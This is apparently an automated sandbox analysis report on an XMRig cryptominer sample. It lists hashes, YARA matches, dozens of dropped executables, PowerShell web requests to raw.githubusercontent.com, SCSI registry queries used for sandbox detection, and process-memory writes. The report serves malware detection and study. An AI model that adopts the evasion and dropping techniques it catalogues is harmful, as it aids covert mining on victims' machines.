xmrig | e78c71ec9c29cf725d26cb88c1a6ba23d7ddf41b254fbb282264b1c56148e4ec

Analysis

max time kernel
116s
max time network
119s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
15-05-2024 23:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
Size

2.8MB
MD5

54c425ba96686c0ab10c9eeb3d8381d0
SHA1

ee8d10db98949f6eae7edfbb4f7a3a0c34465867
SHA256

e78c71ec9c29cf725d26cb88c1a6ba23d7ddf41b254fbb282264b1c56148e4ec
SHA512

94175f8257c411529984ca7a16d8dc6bc131177f1afbb29b959c45de91d2acb94ed56bb7cc51b6ee4dad672682ef2de86c602f7264d8e9bada7dace55d1c610d
SSDEEP

49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0IlnASEx/Rk/:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2Rz

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/3516-0-0x00007FF643310000-0x00007FF643706000-memory.dmp	xmrig
behavioral2/files/0x000800000002340c-5.dat	xmrig
behavioral2/files/0x0007000000023413-16.dat	xmrig
behavioral2/files/0x0007000000023410-17.dat	xmrig
behavioral2/memory/2748-46-0x00007FF6DBCA0000-0x00007FF6DC096000-memory.dmp	xmrig
behavioral2/files/0x0008000000023412-50.dat	xmrig
behavioral2/files/0x0007000000023417-60.dat	xmrig
behavioral2/memory/2300-65-0x00007FF6C4BA0000-0x00007FF6C4F96000-memory.dmp	xmrig
behavioral2/files/0x0007000000023418-64.dat	xmrig
behavioral2/memory/2088-66-0x00007FF716260000-0x00007FF716656000-memory.dmp	xmrig
behavioral2/memory/2932-68-0x00007FF6915E0000-0x00007FF6919D6000-memory.dmp	xmrig
behavioral2/memory/1836-73-0x00007FF6F6BA0000-0x00007FF6F6F96000-memory.dmp	xmrig
behavioral2/memory/3304-75-0x00007FF6F6AA0000-0x00007FF6F6E96000-memory.dmp	xmrig
behavioral2/memory/2316-74-0x00007FF6910A0000-0x00007FF691496000-memory.dmp	xmrig
behavioral2/memory/4044-69-0x00007FF7FBA50000-0x00007FF7FBE46000-memory.dmp	xmrig
behavioral2/memory/3552-67-0x00007FF73FB60000-0x00007FF73FF56000-memory.dmp	xmrig
behavioral2/files/0x0008000000023411-58.dat	xmrig
behavioral2/files/0x0007000000023416-56.dat	xmrig
behavioral2/files/0x0007000000023415-41.dat	xmrig
behavioral2/memory/336-37-0x00007FF7A6E30000-0x00007FF7A7226000-memory.dmp	xmrig
behavioral2/files/0x0007000000023414-34.dat	xmrig
behavioral2/files/0x0007000000023419-80.dat	xmrig
behavioral2/memory/1068-86-0x00007FF7C8610000-0x00007FF7C8A06000-memory.dmp	xmrig
behavioral2/files/0x000700000002341a-91.dat	xmrig
behavioral2/files/0x000800000002340d-95.dat	xmrig
behavioral2/files/0x000700000002341b-98.dat	xmrig
behavioral2/files/0x000700000002341c-103.dat	xmrig
behavioral2/files/0x000700000002341d-107.dat	xmrig
behavioral2/memory/3316-122-0x00007FF73A700000-0x00007FF73AAF6000-memory.dmp	xmrig
behavioral2/files/0x000700000002341f-126.dat	xmrig
behavioral2/files/0x0007000000023420-129.dat	xmrig
behavioral2/files/0x0007000000023421-135.dat	xmrig
behavioral2/memory/2220-131-0x00007FF646CB0000-0x00007FF6470A6000-memory.dmp	xmrig
behavioral2/memory/4316-128-0x00007FF6B28A0000-0x00007FF6B2C96000-memory.dmp	xmrig
behavioral2/files/0x000700000002341e-124.dat	xmrig
behavioral2/files/0x0007000000023424-142.dat	xmrig
behavioral2/files/0x0007000000023426-151.dat	xmrig
behavioral2/memory/1996-158-0x00007FF7DF520000-0x00007FF7DF916000-memory.dmp	xmrig
behavioral2/files/0x0007000000023427-163.dat	xmrig
behavioral2/memory/468-166-0x00007FF6D4D70000-0x00007FF6D5166000-memory.dmp	xmrig
behavioral2/files/0x0007000000023428-173.dat	xmrig
behavioral2/files/0x000700000002342d-192.dat	xmrig
behavioral2/files/0x000700000002342f-204.dat	xmrig
behavioral2/files/0x000700000002342e-197.dat	xmrig
behavioral2/files/0x000700000002342c-195.dat	xmrig
behavioral2/files/0x000700000002342b-190.dat	xmrig
behavioral2/files/0x000700000002342a-185.dat	xmrig
behavioral2/files/0x0007000000023429-178.dat	xmrig
behavioral2/memory/908-165-0x00007FF766890000-0x00007FF766C86000-memory.dmp	xmrig
behavioral2/memory/2016-162-0x00007FF7B7AA0000-0x00007FF7B7E96000-memory.dmp	xmrig
behavioral2/files/0x0007000000023425-155.dat	xmrig
behavioral2/memory/2700-154-0x00007FF735880000-0x00007FF735C76000-memory.dmp	xmrig
behavioral2/files/0x0007000000023422-145.dat	xmrig
behavioral2/memory/3140-119-0x00007FF7A0C10000-0x00007FF7A1006000-memory.dmp	xmrig
behavioral2/memory/4308-110-0x00007FF66C500000-0x00007FF66C8F6000-memory.dmp	xmrig
behavioral2/memory/2120-104-0x00007FF7D4F90000-0x00007FF7D5386000-memory.dmp	xmrig
behavioral2/memory/1136-99-0x00007FF7DE510000-0x00007FF7DE906000-memory.dmp	xmrig
behavioral2/memory/2036-93-0x00007FF7D4EB0000-0x00007FF7D52A6000-memory.dmp	xmrig
behavioral2/memory/3516-1387-0x00007FF643310000-0x00007FF643706000-memory.dmp	xmrig
behavioral2/memory/4044-1719-0x00007FF7FBA50000-0x00007FF7FBE46000-memory.dmp	xmrig
behavioral2/memory/1068-2059-0x00007FF7C8610000-0x00007FF7C8A06000-memory.dmp	xmrig
behavioral2/memory/2036-2199-0x00007FF7D4EB0000-0x00007FF7D52A6000-memory.dmp	xmrig
behavioral2/memory/1136-2200-0x00007FF7DE510000-0x00007FF7DE906000-memory.dmp	xmrig
behavioral2/memory/3140-2201-0x00007FF7A0C10000-0x00007FF7A1006000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

flow	pid	Process
8	1300	powershell.exe
10	1300	powershell.exe
16	1300	powershell.exe
17	1300	powershell.exe
19	1300	powershell.exe
21	1300	powershell.exe
22	1300	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1300	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
336	adqWZsQ.exe
2748	ABcQfpg.exe
2300	GpAWmFJ.exe
1836	iGLCaTJ.exe
2316	GrhuIBv.exe
2088	htpxduv.exe
3552	geeHHDE.exe
3304	HybSgSu.exe
2932	FNClqkh.exe
4044	jvcspfu.exe
1068	OHkNcXJ.exe
2036	riITcaF.exe
2120	rdeGiIr.exe
1136	yqHZBEx.exe
4308	kPyreuc.exe
3140	OWiIfbG.exe
4316	jkiMEsC.exe
3316	vRtcyzq.exe
2220	pmbhwOm.exe
2700	YsvWNXz.exe
1996	IBlciVz.exe
2016	rAGuyUF.exe
908	lSPeVxw.exe
468	YNmjZJq.exe
968	FFBkVQO.exe
5072	JfnvvZI.exe
1088	CqHHiwc.exe
4864	ulpKdti.exe
3804	AegnXVD.exe
5096	CLQDDnS.exe
1800	wBhDzYR.exe
2560	YpVAgfL.exe
2308	wtHCFmP.exe
4360	YqcpDnO.exe
5048	EbpPsAl.exe
3672	KiPFIce.exe
3372	GZGoQRy.exe
4608	NgPaMyk.exe
224	ZdnTTwP.exe
988	tcgmmEg.exe
396	dyABklh.exe
1220	AsQIDlR.exe
1028	khfsTLA.exe
1184	ORSdHEk.exe
876	YqmtDrq.exe
4812	SbICzMf.exe
4024	XaWuOYF.exe
4908	aKywbfD.exe
4952	wckvcBC.exe
4348	YygCuwW.exe
3868	sgtDsth.exe
4184	EixKwRx.exe
544	pWcCsYK.exe
4988	CTKPpxx.exe
924	IWFuQSx.exe
4372	ugkNrGW.exe
4656	mGVviYi.exe
456	XGTHtwB.exe
5028	pXeROyR.exe
1552	BgVvwyd.exe
4900	lIcrtgP.exe
4692	IxhtLou.exe
3492	Kpzurvq.exe
5076	qUWpulk.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3516-0-0x00007FF643310000-0x00007FF643706000-memory.dmp	upx
behavioral2/files/0x000800000002340c-5.dat	upx
behavioral2/files/0x0007000000023413-16.dat	upx
behavioral2/files/0x0007000000023410-17.dat	upx
behavioral2/memory/2748-46-0x00007FF6DBCA0000-0x00007FF6DC096000-memory.dmp	upx
behavioral2/files/0x0008000000023412-50.dat	upx
behavioral2/files/0x0007000000023417-60.dat	upx
behavioral2/memory/2300-65-0x00007FF6C4BA0000-0x00007FF6C4F96000-memory.dmp	upx
behavioral2/files/0x0007000000023418-64.dat	upx
behavioral2/memory/2088-66-0x00007FF716260000-0x00007FF716656000-memory.dmp	upx
behavioral2/memory/2932-68-0x00007FF6915E0000-0x00007FF6919D6000-memory.dmp	upx
behavioral2/memory/1836-73-0x00007FF6F6BA0000-0x00007FF6F6F96000-memory.dmp	upx
behavioral2/memory/3304-75-0x00007FF6F6AA0000-0x00007FF6F6E96000-memory.dmp	upx
behavioral2/memory/2316-74-0x00007FF6910A0000-0x00007FF691496000-memory.dmp	upx
behavioral2/memory/4044-69-0x00007FF7FBA50000-0x00007FF7FBE46000-memory.dmp	upx
behavioral2/memory/3552-67-0x00007FF73FB60000-0x00007FF73FF56000-memory.dmp	upx
behavioral2/files/0x0008000000023411-58.dat	upx
behavioral2/files/0x0007000000023416-56.dat	upx
behavioral2/files/0x0007000000023415-41.dat	upx
behavioral2/memory/336-37-0x00007FF7A6E30000-0x00007FF7A7226000-memory.dmp	upx
behavioral2/files/0x0007000000023414-34.dat	upx
behavioral2/files/0x0007000000023419-80.dat	upx
behavioral2/memory/1068-86-0x00007FF7C8610000-0x00007FF7C8A06000-memory.dmp	upx
behavioral2/files/0x000700000002341a-91.dat	upx
behavioral2/files/0x000800000002340d-95.dat	upx
behavioral2/files/0x000700000002341b-98.dat	upx
behavioral2/files/0x000700000002341c-103.dat	upx
behavioral2/files/0x000700000002341d-107.dat	upx
behavioral2/memory/3316-122-0x00007FF73A700000-0x00007FF73AAF6000-memory.dmp	upx
behavioral2/files/0x000700000002341f-126.dat	upx
behavioral2/files/0x0007000000023420-129.dat	upx
behavioral2/files/0x0007000000023421-135.dat	upx
behavioral2/memory/2220-131-0x00007FF646CB0000-0x00007FF6470A6000-memory.dmp	upx
behavioral2/memory/4316-128-0x00007FF6B28A0000-0x00007FF6B2C96000-memory.dmp	upx
behavioral2/files/0x000700000002341e-124.dat	upx
behavioral2/files/0x0007000000023424-142.dat	upx
behavioral2/files/0x0007000000023426-151.dat	upx
behavioral2/memory/1996-158-0x00007FF7DF520000-0x00007FF7DF916000-memory.dmp	upx
behavioral2/files/0x0007000000023427-163.dat	upx
behavioral2/memory/468-166-0x00007FF6D4D70000-0x00007FF6D5166000-memory.dmp	upx
behavioral2/files/0x0007000000023428-173.dat	upx
behavioral2/files/0x000700000002342d-192.dat	upx
behavioral2/files/0x000700000002342f-204.dat	upx
behavioral2/files/0x000700000002342e-197.dat	upx
behavioral2/files/0x000700000002342c-195.dat	upx
behavioral2/files/0x000700000002342b-190.dat	upx
behavioral2/files/0x000700000002342a-185.dat	upx
behavioral2/files/0x0007000000023429-178.dat	upx
behavioral2/memory/908-165-0x00007FF766890000-0x00007FF766C86000-memory.dmp	upx
behavioral2/memory/2016-162-0x00007FF7B7AA0000-0x00007FF7B7E96000-memory.dmp	upx
behavioral2/files/0x0007000000023425-155.dat	upx
behavioral2/memory/2700-154-0x00007FF735880000-0x00007FF735C76000-memory.dmp	upx
behavioral2/files/0x0007000000023422-145.dat	upx
behavioral2/memory/3140-119-0x00007FF7A0C10000-0x00007FF7A1006000-memory.dmp	upx
behavioral2/memory/4308-110-0x00007FF66C500000-0x00007FF66C8F6000-memory.dmp	upx
behavioral2/memory/2120-104-0x00007FF7D4F90000-0x00007FF7D5386000-memory.dmp	upx
behavioral2/memory/1136-99-0x00007FF7DE510000-0x00007FF7DE906000-memory.dmp	upx
behavioral2/memory/2036-93-0x00007FF7D4EB0000-0x00007FF7D52A6000-memory.dmp	upx
behavioral2/memory/3516-1387-0x00007FF643310000-0x00007FF643706000-memory.dmp	upx
behavioral2/memory/4044-1719-0x00007FF7FBA50000-0x00007FF7FBE46000-memory.dmp	upx
behavioral2/memory/1068-2059-0x00007FF7C8610000-0x00007FF7C8A06000-memory.dmp	upx
behavioral2/memory/2036-2199-0x00007FF7D4EB0000-0x00007FF7D52A6000-memory.dmp	upx
behavioral2/memory/1136-2200-0x00007FF7DE510000-0x00007FF7DE906000-memory.dmp	upx
behavioral2/memory/3140-2201-0x00007FF7A0C10000-0x00007FF7A1006000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\fbNFXtb.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\sWRAsgr.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\rYvMfNr.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\RaeWYlt.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\wdnQVMk.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\SNUVgJq.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\bVdkwbs.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\DoreZUF.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\VTqAnpV.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\PQJFGyb.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\MxTjUId.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\YufQemr.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\HcQwRGi.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\IfAmBbH.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\aKywbfD.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\DrvRzTG.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\obouZtY.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\oVnwlBB.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\ArOrtaq.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\hhVZRRD.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\baXrPIW.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\jkiMEsC.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\CTKPpxx.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\CrTuFwT.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\nAULpcq.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\XYgkVNz.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\mzYmJUy.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\ZBdlnhE.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\kQXjrNb.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\ciXtcIZ.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\tmGEkPo.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\rdwhjff.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\juNPiMW.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\nqeGVuD.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\rdeGiIr.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\eFejCrw.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\QfBejwp.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\mIaKzkq.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\VppIgkQ.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\SmiFcAE.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\vmNHMfc.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\bmbUZHZ.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\xciiXCg.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\LISamFS.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\SwnOxQj.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\qaCJREt.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\syoeFTk.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\NIdfyRp.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\qxfbCoO.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\uQRnOFU.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\eNgOrWF.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\JUsYomF.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\ZAUSbiA.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\CLQDDnS.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\tjEXKLd.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\DwVyoNL.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\BoVUzCB.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\UBnuTMW.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\mDHfNKm.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\nAJgqaR.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\CoLJoyk.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\HWknlme.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\FFBkVQO.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
File created	C:\Windows\System\vdksRXr.exe	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe

Modifies data under HKEY_USERS 18 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1300	powershell.exe
1300	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeLockMemoryPrivilege	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
Token: SeCreateGlobalPrivilege	4920	dwm.exe
Token: SeChangeNotifyPrivilege	4920	dwm.exe
Token: 33	4920	dwm.exe
Token: SeIncBasePriorityPrivilege	4920	dwm.exe
Token: SeShutdownPrivilege	4920	dwm.exe
Token: SeCreatePagefilePrivilege	4920	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3516 wrote to memory of 1300	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	83
PID 3516 wrote to memory of 1300	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	83
PID 3516 wrote to memory of 336	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	84
PID 3516 wrote to memory of 336	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	84
PID 3516 wrote to memory of 2748	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	85
PID 3516 wrote to memory of 2748	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	85
PID 3516 wrote to memory of 2300	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	86
PID 3516 wrote to memory of 2300	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	86
PID 3516 wrote to memory of 1836	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	87
PID 3516 wrote to memory of 1836	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	87
PID 3516 wrote to memory of 2316	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	88
PID 3516 wrote to memory of 2316	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	88
PID 3516 wrote to memory of 2088	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	89
PID 3516 wrote to memory of 2088	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	89
PID 3516 wrote to memory of 3552	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	90
PID 3516 wrote to memory of 3552	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	90
PID 3516 wrote to memory of 3304	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	91
PID 3516 wrote to memory of 3304	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	91
PID 3516 wrote to memory of 2932	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	92
PID 3516 wrote to memory of 2932	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	92
PID 3516 wrote to memory of 4044	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	93
PID 3516 wrote to memory of 4044	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	93
PID 3516 wrote to memory of 1068	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	94
PID 3516 wrote to memory of 1068	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	94
PID 3516 wrote to memory of 2036	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	95
PID 3516 wrote to memory of 2036	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	95
PID 3516 wrote to memory of 2120	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	96
PID 3516 wrote to memory of 2120	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	96
PID 3516 wrote to memory of 1136	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	97
PID 3516 wrote to memory of 1136	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	97
PID 3516 wrote to memory of 4308	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	98
PID 3516 wrote to memory of 4308	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	98
PID 3516 wrote to memory of 3140	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	99
PID 3516 wrote to memory of 3140	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	99
PID 3516 wrote to memory of 4316	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	100
PID 3516 wrote to memory of 4316	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	100
PID 3516 wrote to memory of 3316	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	101
PID 3516 wrote to memory of 3316	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	101
PID 3516 wrote to memory of 2220	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	102
